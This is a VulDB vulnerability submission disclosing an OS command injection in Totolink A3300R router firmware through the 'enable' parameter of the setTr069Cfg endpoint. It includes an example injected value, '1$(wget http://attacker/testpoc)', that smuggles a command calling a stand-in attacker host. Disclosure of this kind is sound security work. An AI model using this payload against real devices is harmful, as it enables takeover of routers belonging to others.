Submit #792632: Totolink A3300R V17.0.0cu.557_B20221024 OS Command Injectioninfo

TitleTotolink A3300R V17.0.0cu.557_B20221024 OS Command Injection
DescriptionA command injection vulnerability exists in /cgi-bin/cstecgi.cgi for topicurl=setTr069Cfg. The enable parameter is passed to Uci_Set_Str, concatenated into shell command content, and executed by CsteSystem/execv without filtering shell metacharacters. Injected input like 1$(wget http://attacker/testpoc) leads to command execution.
Source⚠️ https://github.com/Svigo-o/TOTOLINK-Vul/tree/main/totolink-a3300r-enable-cmd-injection
User
 Svigo_o (UID 95970)
Submission03/30/2026 04:55 (10 days ago)
Moderation04/06/2026 11:42 (7 days later)
StatusDuplicate
VulDB entry250461 [Totolink A3300R 17.0.0cu.557_B20221024 setTr069Cfg pass command injection]
Points0

Do you want to use VulDB in your project?

Use the official API to access entries easily!